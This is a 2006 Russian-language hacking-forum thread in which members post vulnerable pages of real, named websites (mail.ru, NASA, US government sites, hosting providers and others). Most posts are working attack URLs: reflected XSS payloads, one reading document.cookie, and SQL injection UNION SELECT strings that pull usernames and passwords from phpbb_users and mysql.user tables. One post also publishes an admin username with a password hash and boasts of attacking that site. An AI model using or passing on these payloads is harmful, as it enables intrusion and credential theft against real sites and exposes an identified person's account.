Баги на сайтах.

Discussion in 'Уязвимости' started by D1mOn, 28 Jan 2006.

Thread Status:
Not open for further replies.
  1. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    XSS на go.mail.ru
    Не фильтруется: surl..
    Code:
    http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C%2Burl%253D%2522www%2Edogcatalog%2Enet%252F%2A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE%25E7%25E4%25E0%25ED%25E8%25E5&surl=<script>alert('XSS')%3B</script>
    Не фильтруется: id, iid, pageurl.
    Code:
    http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl="><script>alert('XSS')%3B</script>&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b
    Не фильтруется: id, imgurl, iid, pageurl.
    Code:
    http://go.mail.ru/details.html?imgurl=http%253A%252F%252Fwww%2Etonnel%2Eru%252Ffonoteka%252Fispol%252F576227168_tonnel%2Egif&id="><script>alert('XSS')%3B</script>&iid=2&pageurl=http%253A%252F%252Fwww%2Etonnel%2Eru%252F%253Fl%253Dfonoteka%2526main%253D33&imgheight=421&imgwidth=300&ref=1&links=1&imgsize=9025
    Подмена фрейма.
    Code:
    http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl=http://www.antichat.ru/&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b
     
    #161 Go0o$E, 25 May 2006
    Last edited: 25 May 2006
    2 people like this.
  2. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    И ещё xss на nasa, лолики они:)
    _http://search.nasa.gov/nasasearch/search/advSearch.jsp?nasaInclude=%3CIMG+SRC%3D%60javascript%3Aalert%28%22slip%3A%27NASA+LOL%27%22%29%60%3E&qt=all&qx=&qm=anywhere&dct=Any+Type&dn=&dt=at&recPerPg=10&displayFormat=detail&sortBy=Scoredesc
     
    #163 .Slip, 25 May 2006
    Last edited: 25 May 2006
    1 person likes this.
  4. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    еще mail.ru
    _http://astral.mail.ru/numer.php?mode=9&cnum=&fio="><script>alert(1)</script>&afio=test

    _http://astral.mail.ru/sin.php?month=11&year=2005&month1=12&year1=2003<script>alert(document.cookie)</script>
     
    1 person likes this.
  5. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    _http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E&method=exact
    _http://www.sabrina.ru/search.php?action=shared_simple&bigboss=l_0&search_kind=and&action=shared_simple&phrase=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E&B1=
    _http://goohoo.ru/search.bat?w=referats&q=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E
     
    #165 .Slip, 25 May 2006
    Last edited: 25 May 2006
  6. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    _http://mybb.ru/cat.php?go='
     
  7. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    [.GOV]
    _http://fedbbs.access.gpo.gov/library/view/lib/?lib=%3Cscript%3Ealert('a1ien')%3C/script%3E
    _http://www.weather.gov/glossary/index.php?letter=%3Cscript%3Ealert(/a1ien/)%3C/script%3E
    _http://allard.senate.gov/public/index.cfm?FuseAction=Polls.Results&PollsPoll_id=16'&IsPopUp=True
     
  8. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    http://www.reusablebags.com/facts.php?id=-5+union+select+1,2,name,4,5,6,7+from+shop+where+id=1/*
     
    1 person likes this.
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Очень интересная вещь:)

    _http://referat.kulichki.net/cgi-bin/refsearch/search.cgi?query=%3Cscript%3Ealert%28%2F[sL1p]%2F%29 %3C%2Fscript%3E&bool=or

    PS Что бы всё нормально работало, уберите пробел между: ...2Fslip%2F%29 %3C%2Fscript%...
     
    #169 .Slip, 27 May 2006
    Last edited: 27 May 2006
  10. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
  11. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    _http://www.rbsearch.ru/search.php?best=0&said=rbs_210&qq=%3Cscript%3Ealert%28%2F%5BsL1p%5D%2F%29%3C%2Fscript%3E&Submit2=%C8%F1%EA%E0%F2%FC
     
    1 person likes this.
  12. fjuDao

    fjuDao Member

    Joined:
    27 May 2006
    Messages:
    3
    Likes Received:
    7
    Reputations:
    5
    forum.fozya.com - туса педофилов

    _http://www.fozya.com/anecdot.php?view=all&n=1-100&category=19999+UNION+SELECT+0,0,user_password,0,0,0,username+FROM+phpbb_users+LIMIT+0,10/*

    детей жалко. Сочувствующие приймите меры.

    админ:
    Fozya:67bf9ec4b550e0a91bc8f2ecb0ceb0dc
    пароль он может уже поменял (я там поучил их жизни :) )
     
    2 people like this.
  13. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    820
    Reputations:
    324
    _http://www.fozya.com/erotika.php?sub=153'
     
  14. LoFFi

    LoFFi Elder - Старейшина

    Joined:
    21 Feb 2006
    Messages:
    194
    Likes Received:
    90
    Reputations:
    85
    VALUEHOST.RU

    _http://www.valuehost.ru/signup/?sg=1+union+select+1,2,user,password,5,6,7,8,9,10+from+mysql.user/*

    ВНИМАНИЕ!!! Защищено от киддисов.
     
  15. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
  16. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    _http://www.pci.ru/index2.php?PHPSESSID=71b154d4e17f24558d92e1033fddf37c&action=search&fr_name=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E%3Ch1%3EV+test%3C%2Fh1%3E
     
  17. LoFFi

    LoFFi Elder - Старейшина

    Joined:
    21 Feb 2006
    Messages:
    194
    Likes Received:
    90
    Reputations:
    85
    1 person likes this.
  18. KoTeG

    KoTeG Banned

    Joined:
    29 Apr 2006
    Messages:
    198
    Likes Received:
    165
    Reputations:
    2
    _http://www.netsec.ru/404.php-сайт насколько я знаб Green_Bear
     
    #178 KoTeG, 28 May 2006
    Last edited: 28 May 2006
  19. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    http://www.youtube.com/watch?v=JFIrcev6Lh4&search=macbook%20apple%20bootcamp%20laptop%2'0hardware

    http://www.sela.ru/catalog/allmodel.php?pol=6&gr1=47&gr2=23'2&col=
     
    #179 Dracula4ever, 28 May 2006
    Last edited: 28 May 2006
  20. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    На главной странице;)
    _http://www.westbyte.com/index.phtml?lng=Russian"><script>alert(/[sL1p]/)</script>
    _http://www.qmp3.ru/search.php?string=http%3A%2F%2Fwww.westbyte.com%2Findex.phtml%3Flng%3DRussian%22%3E%3Cscript%3Ealert%28%2F%5BsL1p%5D%2F%29%3C%2Fscript%3E&st=all
    _http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd
     
    1 person likes this.
Thread Status:
Not open for further replies.